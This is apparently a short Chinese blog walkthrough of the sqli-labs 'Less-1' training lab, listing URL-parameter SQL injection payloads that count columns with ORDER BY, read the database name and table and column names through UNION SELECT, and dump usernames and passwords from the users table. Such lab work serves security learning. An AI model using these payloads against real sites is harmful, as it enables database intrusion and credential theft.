sql注入——靶场Less1

?id=1

?id=99'union select 1,2,3--+

查看占位

?id=1' order by 3--+

尝试出表有几列

?id=1' order by 4--+

说明只有三列

?id=99' union select 1,database(),3--+

查询当前使用的数据库的名称

?id=99' union select 1,group_concat(table_name),3 from information_schema.tables where table.schema='security'--+

查询security表中有哪些表

?id=99' union select 1,group_concat(column_name),3 from information_schema.columns where table_schema='security' and table_name='users'--+

查询users表中有哪些信息

?id=99' union select 1,group_concat(concat_ws(';',username,password)),3 from security.users--+

展示所有users表中的信息

相关推荐
许苑向上4 分钟前
最详细【Elasticsearch】Elasticsearch Java API + Spring Boot集成 实战入门(基础篇)
java·数据库·spring boot·elasticsearch
CodeCraft Studio1 小时前
【实用技能】在 SQL Server 中使用 LIMIT 子句的替代方案
数据库·sql·sqlserver
Mephisto.java1 小时前
【大数据学习 | kafka】kafka的偏移量管理
大数据·sql·oracle·sqlite·json·hbase
jlting1952 小时前
HiveSQL 中判断字段是否包含某个值的方法
数据库·sql
求一个好offer拜托拜托2 小时前
SQL常见语法
数据库·sql
喵手2 小时前
PostgreSQL 增量备份:保护你的数据资产
数据库·postgresql
cliffordl2 小时前
SQLAlchemy 介绍与实践
数据库·python
dal118网工任子仪2 小时前
SQL报错注入检测方法与攻击方法
笔记·sql·学习·计算机网络
文军的烹饪实验室2 小时前
sqlalchemy连接mysql数据库
数据库·mysql
安 当 加 密2 小时前
【安当产品应用案例100集】028-实现SQL Server数据库的透明加密
数据库·oracle